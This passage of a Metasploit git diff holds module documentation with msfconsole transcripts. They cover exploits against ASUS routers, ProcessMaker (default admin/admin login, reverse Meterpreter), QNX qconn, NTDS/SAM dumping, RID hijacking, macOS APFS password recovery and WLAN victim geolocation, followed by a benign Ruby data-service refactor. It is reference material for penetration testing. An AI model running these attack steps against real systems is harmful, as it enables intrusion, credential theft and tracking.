The port for Telnetd to bind (default: `4444`)
|
||||
|
||||
**TelnetTimeout**
|
||||
|
||||
The number of seconds to wait for connection to telnet (default: `10`)
|
||||
|
||||
**TelnetBannerTimeout**
|
||||
|
||||
The number of seconds to wait for the telnet banner (default: `25`)
|
||||
|
||||
**CommandShellCleanupCommand**
|
||||
|
||||
A command to run before the session is closed (default: `exit`)
|
||||
|
||||
If the session is killed (CTRL+C) rather than exiting cleanly,
|
||||
the telnet port remains open, but is unresponsive, and prevents
|
||||
re-exploitation until the device is rebooted.
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/linux/misc/asus_infosvr_auth_bypass_exec
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set rhost 10.1.1.1
|
||||
rhost => 10.1.1.1
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set telnetport 4444
|
||||
telnetport => 4444
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > set verbose true
|
||||
verbose => true
|
||||
msf exploit(linux/misc/asus_infosvr_auth_bypass_exec) > run
|
||||
|
||||
[*] 10.1.1.1 - Starting telnetd on port 4444...
|
||||
[*] 10.1.1.1 - Waiting for telnet service to start on port 4444...
|
||||
[*] 10.1.1.1 - Connecting to 10.1.1.1:4444...
|
||||
[*] 10.1.1.1 - Trying to establish a telnet session...
|
||||
[+] 10.1.1.1 - Telnet session successfully established...
|
||||
[*] Found shell.
|
||||
[*] Command shell session 1 opened (10.1.1.197:42875 -> 10.1.1.1:4444) at 2017-11-28 07:38:37 -0500
|
||||
|
||||
id
|
||||
/bin/sh: id: not found
|
||||
# cat /proc/version
|
||||
cat /proc/version
|
||||
Linux version 2.6.30.9 (root@wireless-desktop) (gcc version 3.4.6-1.3.6) #2 Thu Sep 18 18:12:23 CST 2014
|
||||
# exit
|
||||
exit
|
||||
```
|
||||
|
|
@ -0,0 +1,26 @@
|
|||
## Vulnerable Application
|
||||
|
||||
This module does not exploit a particular vulnerability. It passively listens
|
||||
for an incoming connection from a secondary exploit or payload. In addition,
|
||||
this module provides an unforgettable luncheon experience.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/hams/steamed```
|
||||
3. Do: ```set payload [any payload]```
|
||||
4. Do: ```set target [0 or 1]```
|
||||
4. Do: ```exploit```
|
||||
5. Enjoy
|
||||
|
||||
## Options
|
||||
|
||||
**VERBOSE**
|
||||
|
||||
This option will further enhance the experience.
|
||||
|
||||
## Scenarios
|
||||
|
||||
Target 0: Your roast is ruined! Will fast food suffice?
|
||||
|
||||
Target 1: You crash on an alien planet. Will you ever play the piano again?
|
|
@ -0,0 +1,88 @@
|
|||
## Description
|
||||
|
||||
This module will generate and upload a plugin to ProcessMaker resulting in execution of PHP code as the web server user.
|
||||
|
||||
Credentials for a valid user account with Administrator roles is required to run this module.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
[ProcessMaker](https://www.processmaker.com/) workflow management software allows public and private organizations to automate document intensive, approval-based processes across departments and systems. Business users and process experts with no programming experience can design and run workflows.
|
||||
|
||||
This module has been tested successfully on ProcessMaker versions:
|
||||
|
||||
* 1.6-4276, 2.0.23, 3.0 RC 1, 3.2.0, 3.2.1 on Windows 7 SP 1
|
||||
* 3.2.0 on Debian Linux 8
|
||||
|
||||
Source and Installers:
|
||||
|
||||
* [ProcessMaker](https://sourceforge.net/projects/processmaker/files/ProcessMaker/)
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use exploit/multi/http/processmaker_plugin_upload`
|
||||
3. Do: `set RHOST [IP]`
|
||||
4. Do: `set USERNAME [USERNAME]` (default: `admin`)
|
||||
5. Do: `set PASSWORD [PASSWORD]` (default: `admin`)
|
||||
6. Do: `set WORKSPACE [WORKSPACE]` (default: `workflow`)
|
||||
7. Do: `run`
|
||||
8. You should get a session
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**Username**
|
||||
|
||||
The username for a ProcessMaker user with Administrator roles (default: `admin`).
|
||||
|
||||
**Password**
|
||||
|
||||
The password for the ProcessMaker user (default: `admin`).
|
||||
|
||||
The default password for the `admin` user is `admin` on ProcessMaker versions 1.x and 2.x.
|
||||
|
||||
For ProcessMaker 3.x onwards, the default password is specified during installation and cannot be the same as the username.
|
||||
|
||||
However; when creating a new workspace a new user with Administrator roles is also created. The default username and password for the new user are `admin` and `admin` respectively.
|
||||
|
||||
**Workspace**
|
||||
|
||||
The ProcessMaker workspace for which the specified user has Administrator roles. (default: `workflow`)
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
```
|
||||
msf > use exploit/multi/http/processmaker_plugin_upload
|
||||
msf exploit(processmaker_plugin_upload) > set rhost 172.16.191.202
|
||||
rhost => 172.16.191.202
|
||||
msf exploit(processmaker_plugin_upload) > set username admin
|
||||
username => admin
|
||||
msf exploit(processmaker_plugin_upload) > set password admin
|
||||
password => admin
|
||||
msf exploit(processmaker_plugin_upload) > set workspace sample
|
||||
workspace => sample
|
||||
msf exploit(processmaker_plugin_upload) > set rport 8080
|
||||
rport => 8080
|
||||
msf exploit(processmaker_plugin_upload) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.181:4444
|
||||
[*] Authenticating as user 'admin'
|
||||
[+] 172.16.191.202:8080 Authenticated as user 'admin'
|
||||
[*] 172.16.191.202:8080 Uploading plugin 'zqkMpDOiIlNEvhkNnV' (23552 bytes)
|
||||
[*] Sending stage (33986 bytes) to 172.16.191.202
|
||||
[*] Meterpreter session 1 opened (172.16.191.181:4444 -> 172.16.191.202:36592) at 2017-06-10 04:21:25 -0400
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV-.tar
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV.php
|
||||
[+] Deleted ../../shared/sites/sample/files/input/zqkMpDOiIlNEvhkNnV/class.zqkMpDOiIlNEvhkNnV.php
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: user (1000)
|
||||
meterpreter > sysinfo
|
||||
Computer : debian
|
||||
OS : Linux debian 3.16.0-4-amd64 #1 SMP Debian 3.16.43-2 (2017-04-30) x86_64
|
||||
Meterpreter : php/linux
|
||||
```
|
||||
|
|
@ -0,0 +1,60 @@
|
|||
## Description
|
||||
|
||||
This module uses the qconn daemon on [QNX](http://www.qnx.com/)
|
||||
systems to gain a shell.
|
||||
|
||||
The QNX qconn daemon does not require authentication and allows
|
||||
remote users to execute arbitrary operating system commands.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
The QNX qconn daemon is a service provider that provides support,
|
||||
such as profiling system information, to remote IDE components.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* QNX Neutrino 6.5.0 (x86)
|
||||
* QNX Neutrino 6.5.0 SP1 (x86)
|
||||
|
||||
QNX Neutrino 6.5.0 Service Pack 1 is available here:
|
||||
|
||||
* http://www.qnx.com/download/feature.html?programid=23665
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. `use exploit/unix/misc/qnx_qconn_exec`
|
||||
3. `set rhost <IP>`
|
||||
4. `set rport <PORT>`
|
||||
5. `run`
|
||||
6. You should get a session
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
```
|
||||
msf5 > use exploit/unix/misc/qnx_qconn_exec
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > set rhost 172.16.191.215
|
||||
rhost => 172.16.191.215
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > set rport 8000
|
||||
rport => 8000
|
||||
msf5 exploit(unix/misc/qnx_qconn_exec) > run
|
||||
|
||||
[*] 172.16.191.215:8000 - Sending payload...
|
||||
[+] 172.16.191.215:8000 - Payload sent successfully
|
||||
[*] Found shell.
|
||||
[*] Command shell session 1 opened (172.16.191.188:33641 -> 172.16.191.215:8000) at 2018-03-21 00:19:37 -0400
|
||||
|
||||
|
||||
0oxdgl2UgHIvCYBO
|
||||
# id
|
||||
id
|
||||
uid=0(root) gid=0(root)
|
||||
# uname -a
|
||||
uname -a
|
||||
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
|
||||
```
|
||||
|
|
@ -0,0 +1,43 @@
|
|||
This module uses a vulnerability in macOS High Sierra's `log` command. It uses the logs of the Disk Utility app to recover the password of an APFS encrypted volume from when it was created.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
* macOS 10.13.0
|
||||
* macOS 10.13.1
|
||||
* macOS 10.13.2
|
||||
* macOS 10.13.3*
|
||||
|
||||
|
||||
\* On macOS 10.13.3, the password can only be recovered if the drive was encrypted before the system upgrade to 10.13.3. See [here](https://www.mac4n6.com/blog/2018/3/21/uh-oh-unified-logs-in-high-sierra-1013-show-plaintext-password-for-apfs-encrypted-external-volumes-via-disk-utilityapp) for more info
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Start `msfconsole`
|
||||
2. Do: `use post/osx/gather/apfs_encrypted_volume_passwd`
|
||||
3. Do: set the `MOUNT_PATH` option if needed
|
||||
4. Do: ```run```
|
||||
5. You should get the password
|
||||
|
||||
## Options
|
||||
|
||||
**MOUNT_PATH**
|
||||
|
||||
`MOUNT_PATH` is the path on the macOS system where the encrypted drive is (or was) mounted. This is *not* the path under `/Volumes`
|
||||
|
||||
## Scenarios
|
||||
|
||||
Typical run against an OSX session, after creating a new APFS disk using Disk Utility:
|
||||
|
||||
```
|
||||
msf5 exploit(multi/handler) > use post/osx/gather/apfs_encrypted_volume_passwd
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > set SESSION -1
|
||||
SESSION => -1
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) > exploit
|
||||
|
||||
[+] APFS command found: newfs_apfs -i -E -S aa -v Untitled disk2s2 .
|
||||
[+] APFS command found: newfs_apfs -A -e -E -S secretpassword -v Untitled disk2 .
|
||||
[*] Post module execution completed
|
||||
msf5 post(osx/gather/apfs_encrypted_volume_passwd) >
|
||||
```
|
|
@ -0,0 +1,58 @@
|
|||
## Creating A Testing Environment
|
||||
To use this module you need an meterpreter on a domain controller.
|
||||
The meterpreter has to have SYSTEM priviliges.
|
||||
Powershell has te be installed.
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
1. Windows Server 2008r2
|
||||
|
||||
This module was not tested against, but may work against:
|
||||
|
||||
1. Other versions of Windows server.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start msfconsole
|
||||
2. Obtain a meterpreter session with a meterpreter via whatever method.
|
||||
3. Ensure the metepreter has SYSTEM priviliges.
|
||||
4. Ensure powershell is installed.
|
||||
3. Do: 'use post/windows/gather/ntds_grabber '
|
||||
4. Do: 'set session #'
|
||||
5. Do: 'run'
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Server 2008r2 with an x86 meterpreter
|
||||
|
||||
msf exploit(psexec) > use post/windows/gather/ntds_grabber
|
||||
msf post(ntds_grabber) > set session #
|
||||
session => #
|
||||
msf post(ntds_grabber) > run
|
||||
|
||||
[+] [2017.04.05-12:26:49] Running as SYSTEM
|
||||
[+] [2017.04.05-12:26:50] Running on a domain controller
|
||||
[+] [2017.04.05-12:26:50] PowerShell is installed.
|
||||
[-] [2017.04.05-12:26:50] The meterpreter is not the same architecture as the OS! Migrating to process matching architecture!
|
||||
[*] [2017.04.05-12:26:50] Starting new x64 process C:\windows\sysnative\svchost.exe
|
||||
[+] [2017.04.05-12:26:51] Got pid 3088
|
||||
[*] [2017.04.05-12:26:51] Migrating..
|
||||
[+] [2017.04.05-12:26:56] Success!
|
||||
[*] [2017.04.05-12:26:56] Powershell Script executed
|
||||
[*] [2017.04.05-12:26:59] Creating All.cab
|
||||
[*] [2017.04.05-12:27:01] Waiting for All.cab
|
||||
[*] [2017.04.05-12:27:02] Waiting for All.cab
|
||||
[+] [2017.04.05-12:27:02] All.cab should be created in the current working directory
|
||||
[*] [2017.04.05-12:27:05] Downloading All.cab
|
||||
[+] [2017.04.05-12:27:15] All.cab saved in: /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab
|
||||
[*] [2017.04.05-12:27:15] Removing All.cab
|
||||
[+] [2017.04.05-12:27:15] All.cab Removed
|
||||
[*] Post module execution completed
|
||||
msf post(ntds_grabber) > loot
|
||||
|
||||
Loot
|
||||
====
|
||||
|
||||
host service type name content info path
|
||||
---- ------- ---- ---- ------- ---- ----
|
||||
10.100.0.2 Cabinet File All.cab application/cab Cabinet file containing SAM, SYSTEM and NTDS.dit /home/XXX/.msf4/loot/20170405122715_default_10.100.0.2_CabinetFile_648914.cab
|
|
@ -0,0 +1,144 @@
|
|||
## Overview
|
||||
|
||||
This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine.
|
||||
|
||||
Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.
|
||||
|
||||
By using a `meterpreter` session against a Windows host, the module will try to acquire _**SYSTEM**_ privileges if needed, and will modify some attributes to hijack the permissions of an existing local account and set them to another one.
|
||||
|
||||
For more information see [csl.com.co](http://csl.com.co/rid-hijacking/).
|
||||
|
||||
## Vulnerable Software
|
||||
|
||||
This module has been tested against:
|
||||
|
||||
- Windows XP, 2003. (32 bits)
|
||||
- Windows 8.1 Pro. (64 bits)
|
||||
- Windows 10. (64 bits)
|
||||
- Windows Server 2012. (64 bits)
|
||||
|
||||
This module was not tested against, but may work on:
|
||||
|
||||
- Other versions of windows (x86 and x64).
|
||||
|
||||
## Options
|
||||
|
||||
- **GETSYSTEM**: Try to get _**SYSTEM**_ privileges on the victim. Default: `false`
|
||||
|
||||
- **GUEST_ACCOUNT**: Use the _**GUEST**_ built-in account as the destination of the privileges to be hijacked. Set this account as the _hijacker_. Default: `false`.
|
||||
|
||||
- **SESSION**: The session to run this module on. Default: `none`.
|
||||
|
||||
- **USERNAME**: Set the user account (_SAM Account Name_) of the victim host which will be the destination of the privileges to be _hijacked_. Set this account as the _hijacker_. If **GUEST_ACCOUNT** option is set to `true`, this parameter will be ignored if defined. Default: `none`.
|
||||
|
||||
- **PASSWORD**: Set or change the password of the account defined as the destination of the privileges to be hijacked, either _**GUEST**_ account or the user account set in **USERNAME** option. Set password to the _hijacker_ account. Default: `none`.
|
||||
|
||||
- **RID**: Specify the RID number in decimal of the _victim account_. This number should be the RID of an existing account on the target host, no matter if it is disabled (i.e.: The RID of the _**Administrator**_ built-in account is 500). Set the RID owned by the account that will be _hijacked_. Default: `500`
|
||||
|
||||
## Verification steps
|
||||
|
||||
1. Get a `meterpreter` session on some host.
|
||||
2. Do: `use post/windows/manage/rid_hijack`
|
||||
3. Do: `set SESSION <SESSION_ID>` replacing <SESSION_ID> with the desired session.
|
||||
4. Do: `set GET_SYSTEM true`.
|
||||
5. Do: `set GUEST_ACCOUNT true`.
|
||||
6. Do: `run`
|
||||
7. Log in on the victim host with the GUEST account credentials.
|
||||
|
||||
## Scenarios
|
||||
### Assigning Administrator privileges to Guest built-in account.
|
||||
```
|
||||
msf post(rid_hijack) > set GETSYSTEM true
|
||||
GETSYSTEM => true
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT true
|
||||
GUEST_ACCOUNT => true
|
||||
msf post(rid_hijack) > set SESSION 1
|
||||
SESSION => 1
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Target account: Guest Account
|
||||
[*] Target account username: Invitado
|
||||
[*] Target account RID: 501
|
||||
[*] Account is disabled, activating...
|
||||
[+] Target account enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 500 is set to the account Invitado with original RID 501
|
||||
[*] Post module execution completed
|
||||
```
|
||||
#### Results after login in as the Guest account.
|
||||
|
||||
![guest_account](https://user-images.githubusercontent.com/14118912/36490462-4bf84d68-16f6-11e8-811c-bf2d8c42b93d.PNG)
|
||||
|
||||
### Assigning Administrator privileges to local custom account.
|
||||
```
|
||||
msf post(rid_hijack) > set GETSYSTEM true
|
||||
GETSYSTEM => true
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT false
|
||||
GUEST_ACCOUNT => false
|
||||
msf post(rid_hijack) > set USERNAME testuser
|
||||
USERNAME => testuser
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Checking users...
|
||||
[+] Found testuser account!
|
||||
[*] Target account username: testuser
|
||||
[*] Target account RID: 1002
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 500 is set to the account testuser with original RID 1002
|
||||
[*] Post module execution completed
|
||||
```
|
||||
#### Results after login in as the _testuser_ account.
|
||||
![testuser](https://user-images.githubusercontent.com/14118912/36490561-837bd2f0-16f6-11e8-8dc6-53283bb4d9ea.PNG)
|
||||
|
||||
### Assigning custom privileges to Guest built-in account and setting new password to Guest.
|
||||
```
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT true
|
||||
GUEST_ACCOUNT => true
|
||||
msf post(rid_hijack) > set RID 1002
|
||||
RID => 1002
|
||||
msf post(rid_hijack) > set PASSWORD Password.1
|
||||
PASSWORD => Password.1
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Target account: Guest Account
|
||||
[*] Target account username: Invitado
|
||||
[*] Target account RID: 501
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 1002 is set to the account Invitado with original RID 501
|
||||
[*] Setting Invitado password to Password.1
|
||||
[*] Post module execution completed
|
||||
```
|
||||
### Assigning custom privileges to local custom account and setting new password to custom account.
|
||||
```
|
||||
msf post(rid_hijack) > set GUEST_ACCOUNT false
|
||||
GUEST_ACCOUNT => false
|
||||
msf post(rid_hijack) > set USERNAME testuser
|
||||
USERNAME => testuser
|
||||
msf post(rid_hijack) > set PASSWORD Password.2
|
||||
PASSWORD => Password.2
|
||||
msf post(rid_hijack) > run
|
||||
|
||||
[*] Checking for SYSTEM privileges on session
|
||||
[+] Session is already running with SYSTEM privileges
|
||||
[*] Target OS: Windows 8.1 (Build 9600).
|
||||
[*] Checking users...
|
||||
[+] Found testuser account!
|
||||
[*] Target account username: testuser
|
||||
[*] Target account RID: 1002
|
||||
[+] Target account is already enabled
|
||||
[*] Overwriting RID
|
||||
[+] The RID 1002 is set to the account testuser with original RID 1002
|
||||
[*] Setting testuser password to Password.2
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,113 @@
|
|||
## Description
|
||||
The module send probe request packets through the wlan interfaces. The user can configure the message to be sent
|
||||
(embedded in the SSID field) with a max length of 32 bytes and the time spent in seconds sending those packets
|
||||
(considering a sleep of 10 seconds between each probe request).
|
||||
|
||||
The module borrows most of its code from the @thelightcosine wlan_* modules (everything revolves around the
|
||||
wlanscan API and the DOT11_SSID structure).
|
||||
|
||||
## Scenarios
|
||||
|
||||
This post module uses the remote victim's wireless card to beacon a specific SSID, allowing an attacker to
|
||||
geolocate him or her during an engagement.
|
||||
|
||||
## Verification steps:
|
||||
### Run the module on a remote computer:
|
||||
```
|
||||
msf exploit(ms17_010_eternalblue) > use exploit/multi/handler
|
||||
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
|
||||
payload => windows/meterpreter/reverse_tcp
|
||||
msf exploit(handler) > set lhost 192.168.135.111
|
||||
lhost => 192.168.135.111
|
||||
msf exploit(handler) > set lport 4567
|
||||
lport => 4567
|
||||
msf exploit(handler) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.135.111:4567
|
||||
[*] Starting the payload handler...
|
||||
[*] Sending stage (957487 bytes) to 192.168.135.157
|
||||
[*] Meterpreter session 1 opened (192.168.135.111:4567 -> 192.168.135.157:50661) at 2018-04-20 13:20:34 -0500
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN10X64-1703
|
||||
OS : Windows 10 (Build 15063).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 2
|
||||
Meterpreter : x86/windows
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
msf exploit(handler) > use post/windows/wlan/wlan_probe_request
|
||||
msf post(wlan_probe_request) > set ssid "TEST"
|
||||
ssid => TEST
|
||||
msf post(wlan_probe_request) > set timeout 300
|
||||
timeout => 300
|
||||
msf post(wlan_probe_request) > set session 1
|
||||
session => 1
|
||||
msf post(wlan_probe_request) > run
|
||||
|
||||
[*] Wlan interfaces found: 1
|
||||
[*] Sending probe requests for 300 seconds
|
||||
^C[-] Post interrupted by the console user
|
||||
[*] Post module execution completed
|
||||
msf post(wlan_probe_request) >
|
||||
```
|
||||
|
||||
|
||||
|
||||
### On another computer, use probemon to listen for the SSID:
|
||||
```
|
||||
tmoose@ubuntu:~/rapid7$ ifconfig -a
|
||||
.
|
||||
.
|
||||
.
|
||||
wlx00c0ca6d1287 Link encap:Ethernet HWaddr 00:00:00:00:00:00
|
||||
UP BROADCAST MULTICAST MTU:1500 Metric:1
|
||||
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
|
||||
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
|
||||
collisions:0 txqueuelen:1000
|
||||
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
|
||||
|
||||
tmoose@ubuntu:~/rapid7$ sudo airmon-ng start wlx00c0ca6d1287
|
||||
|
||||
|
||||
Found 6 processes that could cause trouble.
|
||||
If airodump-ng, aireplay-ng or airtun-ng stops working after
|
||||
a short period of time, you may want to kill (some of) them!
|
||||
|
||||
PID Name
|
||||
963 NetworkManager
|
||||
981 avahi-daemon
|
||||
1002 avahi-daemon
|
||||
1170 dhclient
|
||||
1180 dhclient
|
||||
1766 wpa_supplicant
|
||||
|
||||
|
||||
Interface Chipset Driver
|
||||
|
||||
wlx000000000000 Realtek RTL8187L rtl8187 - [phy0]
|
||||
(monitor mode enabled on mon0)
|
||||
|
||||
tmoose@ubuntu:~/rapid7$ cd ..
|
||||
|
||||
tmoose@ubuntu:~$ sudo python probemon.py -t unix -i mon0 -s -r -l | grep TEST
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -59
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -73
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248955 74:ea:3a:8e:a1:6d TEST -68
|
||||
1524248956 74:ea:3a:8e:a1:6d TEST -74
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -59
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -60
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -74
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -73
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -63
|
||||
1524248965 74:ea:3a:8e:a1:6d TEST -78
|
||||
|
||||
.
|
||||
.
|
||||
.
|
||||
|
||||
```
|
|
@ -27,11 +27,15 @@ module DataService
|
|||
include LootDataService
|
||||
|
||||
def name
|
||||
raise 'DataLService#name is not implemented';
|
||||
raise 'DataService#name is not implemented';
|
||||
end
|
||||
|
||||
def active
|
||||
raise 'DataLService#active is not implemented';
|
||||
raise 'DataService#active is not implemented';
|
||||
end
|
||||
|
||||
def is_local?
|
||||
raise 'DataService#is_local? is not implemented';
|
||||
end
|
||||
|
||||
#
|
||||
|
@ -41,11 +45,14 @@ module DataService
|
|||
attr_reader :id
|
||||
attr_reader :name
|
||||
attr_reader :active
|
||||
attr_reader :is_local
|
||||
|
||||
def initialize (id, name, active)
|
||||
def initialize (id, name, active, is_local)
|
||||
self.id = id
|
||||
self.name = name
|
||||
self.active = active
|
||||
self.is_local = is_local
|
||||
|
||||
end
|
||||
|
||||
#######
|
||||
|
@ -55,6 +62,7 @@ module DataService
|
|||
attr_writer :id
|
||||
attr_writer :name
|
||||
attr_writer :active
|
||||
attr_writer :is_local
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -27,13 +27,13 @@ class DataProxy
|
|||
#
|
||||
def error
|
||||
return @error if (@error)
|
||||
return @current_data_service.error if @current_data_service
|
||||
return 'none'
|
||||
return @current_data_service.error if @current_data_service && !@current_data_service.error.nil?
|
||||
return 'unknown'
|
||||
end
|
||||
|
||||
def is_local?
|
||||
if (@current_data_service)
|
||||
return (@current_data_service.name == 'local_db_service')
|
||||
if @current_data_service
|
||||
return @current_data_service.is_local?
|
||||
end
|
||||
|
||||
return false
|
||||
|
@ -43,7 +43,7 @@ class DataProxy
|
|||
# Determines if the data service is active
|
||||
#
|
||||
def active
|
||||
if (@current_data_service)
|
||||
if @current_data_service
|
||||
return @current_data_service.active
|
||||
end
|
||||
|
||||
|
@ -66,11 +66,11 @@ class DataProxy
|
|||
#
|
||||
def set_data_service(data_service_id, online=false)
|
||||
data_service = @data_services[data_service_id.to_i]
|
||||
if (data_service.nil?)
|
||||
if data_service.nil?
|
||||
raise "Data service with id: #{data_service_id} does not exist"
|
||||
end
|
||||
|
||||
if (!online && !data_service.active)
|
||||
if !online && !data_service.active
|
||||
raise "Data service not online: #{data_service.name}, not setting as active"
|
||||
end
|
||||
|
||||
|
@ -85,7 +85,8 @@ class DataProxy
|
|||
@data_services.each_key {|key|
|
||||
name = @data_services[key].name
|
||||
active = !@current_data_service.nil? && name == @current_data_service.name
|
||||
services_metadata << Metasploit::Framework::DataService::Metadata.new(key, name, active)
|
||||
is_local = @data_services[key].is_local?
|
||||
services_metadata << Metasploit::Framework::DataService::Metadata.new(key, name, active, is_local)
|
||||
}
|
||||
|
||||
services_metadata
|
||||
|
@ -95,7 +96,6 @@ class DataProxy
|
|||
# Used to bridge the local db
|
||||
#
|
||||
def method_missing(method, *args, &block)
|
||||
dlog ("Attempting to delegate method: #{method}")
|
||||
unless @current_data_service.nil?
|
||||
@current_data_service.send(method, *args, &block)
|
||||
end
|
||||
|
@ -122,6 +122,29 @@ class DataProxy
|
|||
raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
|
||||
end
|
||||
|
||||
# Adds a valid workspace value to the opts hash before sending on to the data layer.
|
||||
#
|
||||
# @param [Hash] opts The opts hash that will be passed to the data layer.
|
||||
# @param [String] wspace A specific workspace name to add to the opts hash.
|
||||
# @return [Hash] The opts hash with a valid :workspace value added.
|
||||
def add_opts_workspace(opts, wspace = nil)
|
||||
# Some methods use the key :wspace. Let's standardize on :workspace and clean it up here.
|
||||
opts[:workspace] = opts.delete(:wspace) unless opts[:wspace].nil?
|
||||
|
||||
# If the user passed in a specific workspace then use that in opts
|
||||
opts[:workspace] = wspace if wspace
|
||||
|
||||
# We only want to pass the workspace name, so grab it if it is currently an object.
|
||||
if opts[:workspace] && opts[:workspace].is_a?(::Mdm::Workspace)
|
||||
opts[:workspace] = opts[:workspace].name
|
||||
end
|
||||
|
||||
# If we still don't have a :workspace value, just set it to the current workspace.
|
||||
opts[:workspace] = workspace.name if opts[:workspace].nil?
|
||||
|
||||
opts
|
||||
end
|
||||
|
||||
#######
|
||||
private
|
||||
#######
|
||||
|
|
|
@ -2,7 +2,7 @@ module CredentialDataProxy
|
|||
|
||||
def create_credential(opts)
|
||||
begin
|
||||
data_service = self.get_data_service()
|
||||
data_service = self.get_data_service
|
||||
data_service.create_credential(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem creating credential")
|
||||
|
@ -12,6 +12,7 @@ module CredentialDataProxy
|
|||
def creds(opts = {})
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.creds(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem retrieving credentials")
|
||||
|
|
|
@ -17,6 +17,7 @@ module DataProxyAutoLoader
|
|||
autoload :CredentialDataProxy, 'metasploit/framework/data_service/proxy/credential_data_proxy'
|
||||
autoload :NmapDataProxy, 'metasploit/framework/data_service/proxy/nmap_data_proxy'
|
||||
autoload :DbExportDataProxy, 'metasploit/framework/data_service/proxy/db_export_data_proxy'
|
||||
autoload :DbImportDataProxy, 'metasploit/framework/data_service/proxy/db_import_data_proxy'
|
||||
autoload :VulnAttemptDataProxy, 'metasploit/framework/data_service/proxy/vuln_attempt_data_proxy'
|
||||
|
||||
include ServiceDataProxy
|
||||
|
@ -33,5 +34,6 @@ module DataProxyAutoLoader
|
|||
include CredentialDataProxy
|
||||
include NmapDataProxy
|
||||
include DbExportDataProxy
|
||||
include DbImportDataProxy
|
||||
include VulnAttemptDataProxy
|
||||
end
|
|
@ -6,6 +6,7 @@ module DbExportDataProxy
|
|||
path: path,
|
||||
format: format
|
||||
}
|
||||
add_opts_workspace(opts)
|
||||
data_service.run_db_export(opts)
|
||||
rescue Exception => e
|
||||
self.log_error(e, "Problem generating DB Export")
|
||||
|
|
|
@ -0,0 +1,21 @@
|
|||
module DbImportDataProxy
|
||||
def import(opts, &block)
|
||||
begin
|
||||
data_service = self.get_data_service
|
||||
add_opts_workspace(opts)
|
||||
data_service.import(opts, &block)
|
||||
rescue Exception => e
|
||||
